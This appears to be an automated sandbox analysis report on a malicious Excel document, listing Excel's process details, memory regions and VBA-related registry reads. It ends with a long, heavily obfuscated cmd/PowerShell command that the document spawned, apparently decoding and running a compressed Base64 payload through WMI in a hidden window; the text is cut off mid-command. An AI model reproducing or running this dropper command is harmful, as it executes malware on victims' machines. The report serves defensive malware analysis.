c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a (SHA256)
3D_5684_DOC20181101014.xls_.xls
Excel Document
Created at 2018-11-01 09:26:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: excel.exe
1785
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\excel.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:03, Reason: Analysis Target |
| Unmonitor | End Time: 00:04:23, Reason: Self Terminated |
| Monitor Duration | 00:03:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x928 |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A98
0x
A94
0x
A90
0x
A8C
0x
A88
0x
A84
0x
A80
0x
A74
0x
A6C
0x
9E4
0x
9E0
0x
9DC
0x
9D8
0x
9D4
0x
9D0
0x
9CC
0x
9B0
0x
99C
0x
998
0x
988
0x
984
0x
980
0x
97C
0x
978
0x
974
0x
970
0x
96C
0x
968
0x
948
0x
944
0x
940
0x
93C
0x
938
0x
934
0x
930
0x
92C
0x
0
0x
AA8
0x
AAC
0x
AB8
0x
AD0
0x
410
0x
A30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00132fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00152fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00162fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00172fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00182fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00340fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00554fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00560fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00581fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00590000 | 0x0059bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x005a0000 | 0x005a7fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x005c0000 | 0x005cffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x005d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x005e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00787fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00910fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x01d1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01d20000 | 0x01feefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ff0000 | 0x01ff0000 | 0x023e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x026f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x02700fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002710000 | 0x02710000 | 0x02710fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x02720fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x02730fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x02740fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002750000 | 0x02750000 | 0x02751fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027e0000 | 0x027e0000 | 0x028befff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000028c0000 | 0x028c0000 | 0x028c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000028d0000 | 0x028d0000 | 0x028d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x029dffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x029e0000 | 0x029fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02afffff | Private Memory | rw |
|
|
|
- |
| xlintl32.dll | 0x02b00000 | 0x03b47fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003b50000 | 0x03b50000 | 0x03c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c50000 | 0x03c50000 | 0x03c51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c60000 | 0x03c60000 | 0x03c71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c80000 | 0x03c80000 | 0x03c80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c90000 | 0x03c90000 | 0x03d8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003d90000 | 0x03d90000 | 0x03d91fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003da0000 | 0x03da0000 | 0x03e9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003ea0000 | 0x03ea0000 | 0x03ea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003eb0000 | 0x03eb0000 | 0x03eb1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003ec0000 | 0x03ec0000 | 0x03ec1fff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x03ed0000 | 0x03ee0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000003ef0000 | 0x03ef0000 | 0x03ef1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003f00000 | 0x03f00000 | 0x03ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004000000 | 0x04000000 | 0x04011fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004020000 | 0x04020000 | 0x04020fff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x04030000 | 0x04033fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004040000 | 0x04040000 | 0x04041fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004050000 | 0x04050000 | 0x04051fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004060000 | 0x04060000 | 0x04060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004070000 | 0x04070000 | 0x0416ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x04170000 | 0x041eefff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x041f0000 | 0x041f3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x04200fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004210000 | 0x04210000 | 0x04210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004220000 | 0x04220000 | 0x0431ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004320000 | 0x04320000 | 0x0441ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004420000 | 0x04420000 | 0x04420fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004430000 | 0x04430000 | 0x04430fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x04440fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004450000 | 0x04450000 | 0x04450fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004460000 | 0x04460000 | 0x0446ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004470000 | 0x04470000 | 0x04470fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004480000 | 0x04480000 | 0x04480fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x04490fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000044a0000 | 0x044a0000 | 0x044a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000044b0000 | 0x044b0000 | 0x045affff | Private Memory | rw |
|
|
|
- |
| comdlg32.dll.mui | 0x045b0000 | 0x045bcfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000045c0000 | 0x045c0000 | 0x045c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045d0000 | 0x045d0000 | 0x0464ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000004650000 | 0x04650000 | 0x04a4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e50000 | 0x04e50000 | 0x04e51fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e60000 | 0x04e60000 | 0x04e61fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e70000 | 0x04e70000 | 0x04e70fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04e80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x04fa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x04fb0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fc0000 | 0x04fc0000 | 0x04fc2fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x050d0fff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x050e0000 | 0x0510ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005110000 | 0x05110000 | 0x05112fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0519ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051a0000 | 0x051a0000 | 0x0529ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x052a0000 | 0x0535ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000005360000 | 0x05360000 | 0x0545ffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x05460000 | 0x0550afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005510000 | 0x05510000 | 0x05512fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005520000 | 0x05520000 | 0x05522fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005530000 | 0x05530000 | 0x0553ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005540000 | 0x05540000 | 0x0554ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005550000 | 0x05550000 | 0x05550fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005560000 | 0x05560000 | 0x05561fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005570000 | 0x05570000 | 0x05570fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005580000 | 0x05580000 | 0x05581fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005590000 | 0x05590000 | 0x055d7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000055e0000 | 0x055e0000 | 0x056dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000056e0000 | 0x056e0000 | 0x05edffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000005ee0000 | 0x05ee0000 | 0x06222fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000006230000 | 0x06230000 | 0x06277fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006280000 | 0x06280000 | 0x06281fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000006290000 | 0x06290000 | 0x06290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000062a0000 | 0x062a0000 | 0x062a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000062b0000 | 0x062b0000 | 0x062b0fff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x062c0000 | 0x062c3fff | Memory Mapped File | r |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x062d0000 | 0x062d0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000062e0000 | 0x062e0000 | 0x063dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000063e0000 | 0x063e0000 | 0x064dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000064e0000 | 0x064e0000 | 0x064e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000064f0000 | 0x064f0000 | 0x064f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006500000 | 0x06500000 | 0x0657ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006580000 | 0x06580000 | 0x06580fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006590000 | 0x06590000 | 0x0660ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006610000 | 0x06610000 | 0x0670ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006710000 | 0x06710000 | 0x06710fff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 396 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
Registry (59)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\409 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\9 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 56, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 180 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd /c C%PrOGRaMFIlES:~ -7,1%D, , /V:On ,,/%aPPdAta:~-7,1% " , (Se^T j1=^Ew-obje^ct I^o.c^OMp)& (^sET ^ ^J^F^O6=G^('VZBba8^IwGIb/^SpA^O^E^remtR5^Aix)&& (^s^e^t c^WSV=^A^rm^U)&& (Se^T ^ ^BW7=^XV)&( ,, , ,, (^SEt ^ C^ij=^vQN) , ,, )& (Set q^X=^i^I^))&&( , (^set ^ 8^i47=^ ^{`$_), ,, )&&(^s^Et ^ ^c^wH=^kqa02Wx^1/v^fFwy52+7z^fe^+)&& (^SEt ^q0^C^c=^9)&& (SE^T ^ ^OZ=.Co^MpR^ES)&( , , , ,, (s^E^T ^ ^ ^U19=e^a) , , )&( , (set ^8R=O) , )&&( ,(SE^T ^ ^xm=^h) )&& ( , (^s^e^t v^F=^s ^h^i^dDe), )& (S^e^t ^ep3A=^Q^OyR2U^JM)&(, ,, ,,(Se^T G1^yS=^4^oTe1Nn) , )&( (s^Et ^ r^Y=uqSZ^q^t^H7Njw) , )&( , , ,(S^E^T ^a^z8=N.^D^efLa^tesTR) , )& (^SET ^ b^1=^M^()&& (s^eT ^ D^RKS=FI^l^E^ -NoL^ogO )&& (^s^eT q^G=.^I)&& (^S^ET ^Rw=2ZZ^2)&& (S^Et G^Y=CA^C0g^IO)& ( (S^ET ^ e5^S=^`^$P^S^HO^ME[30]+'x'^)""^\"" ), , , )& (^se^t b^aCI=4k^Bwy)&& (,, , (sE^T ^ ^LK=f^R^o^m^ba), )&&(sE^t ^lPo=^([C^hAr]44^).T^oSTRIng)&& (, (s^Et Op^1=4) , )&&(se^T ^ ^E^f=a^f^tO^sH0^5)&(SE^T LI=foRE^ach^-)&&(^SeT ^ ^dv=D)&( , (Se^T ^ ^6rH^Y=^5+8) , ,, , , )&&( , , , (^Se^T ^ dn=Y/D^6) , )&& (^SE^T ^Vp^05=n^oPR)&& (, (^set ^AN=[s^ysTe^m.I^O.ME), ,,, , )&& ( ,(s^E^T ^ ^G5Q1=-^wINDO^w), )&( , ,, (s^ET 7z=o^CESs^ ) , )& (^SeT bO^q=^o^.stReAMRE^ADeR)&& ( , (Se^T ^DG=s^uB4) ,)&&( , (sE^t LI^j=^dap^D0) , )& (SE^t a^Xch=Ho^M^e)&& (S^Et ^ ^Z13= ""\""^(n)&&(, (s^ET e^q=^7) , , , )&& ( , (s^et eZ^P=o) , )&&( , (s^ET DQ=sHO^M^e) ,,, ,, )&& (s^ET ^ r^M=W^M^IC.)& ( (^SET uq^LY=]::^d^EC), , , )&& ( (s^ET ^ l^6e=b^1) , )&& (sE^t P^d^J6=[^2^1]^+$Ps)&&( ,(^SET ^ ^3B=0^dG^IO^e) ,, , , , )&& (^S^Et ^ Zz^t=g^klAj)&& (^sEt s^O= ^'CA^ll'^ ^'cRe^Ate^' ""^po)& (^SeT ^ q^2=0v^5W)&&(^se^T ^ ^A2=Ea^cH-^obj)&& ( ,(^SE^t ^ Co^Jf=^e) ,,,)&(^sEt ^ ^e^yWN=j^D8h)&&( ,(s^ET ^ ^z^RJ=^K5) , , )&& (^SeT J^6=^Fjr^iXLMf5)& ( , (s^ET ^ J^Z=1^z) ,, ,, , )&& (,(S^eT ^M^t=/D^+iA1Um^k6y^RKXmH) ,)&&( , ,,, , (^sEt 3^M^K^1=obj^ECt{nE^w^-o^bj^e), )& (se^T g^BQ=s^i)& (^seT ^ ^aMG=^u)& ( , ,, (^sE^T ^ ^aw^yI=^l) , )&( , (Se^t ^ ^ir^1^V=^h) )& (, , ,(S^Et uU^H=n^ ^ ^^^&^ ^(^ ), )&& ( , (S^Et o^JV=^^^|^ fOR),)&& (^S^e^t v^Z^c=$^p^S)&& (s^et ^ ^g^Vkp=^6)& ( , (SE^T ^CY=^4) , )&& (S^et 9c^u^B=^ )&& (se^t ^ ^Rz=^SS )&& (s^et ^ z^R=^G4G^u^tW)&&( , (se^T ^ gx^b=b^Yp) ,)& ( , (SE^t ^ ^a^g=z^P), )&&(, , , , , (S^eT sZ^G=Nt^Er^ac ^-), )& ( , (^sEt l^V^p=^OmPre^S^s^ ^)^ ) ,)& ( ,(^S^ET x^dNR=bg8^r^j), )&(,(s^E^T ^ l^R=^Ext^.eNcO) ,)&& (se^T ^ c^g=W^e^r^SH^e^ll^ -N^O)&& (^s^ET ^ OE^9^Q=DS^hyxy^yV2Apb^uy)&& ( (sET ^ Sq^5^s=Mo^RY^S^T^RE^a^m] ^[C^On^vER), )&& ( , (s^ET x^S=^re^ss^i), )& (S^eT p^v=^) "")&& ( , , , , ,(Se^t ^ I^G4^Q=^CT), )&&( , (S^ET ^ B^9s=^exe pR) ,)& (, (sE^T ^s^Hnp=0M^y), , , )&& (, (sE^T ^ ^Je=^m8) , )& (Se^t ^ bv=fa^qfNGZQobl^CJ^p)&&( , (se^T ^ q8=^v^v) , )&& (Se^T ^ ^S^l=Q^VH^cO8^e1hjBC^Xsd1^fexS2i)&& ( ,(s^ET ^ ^rj^UN=ni) , )& ( (SE^t 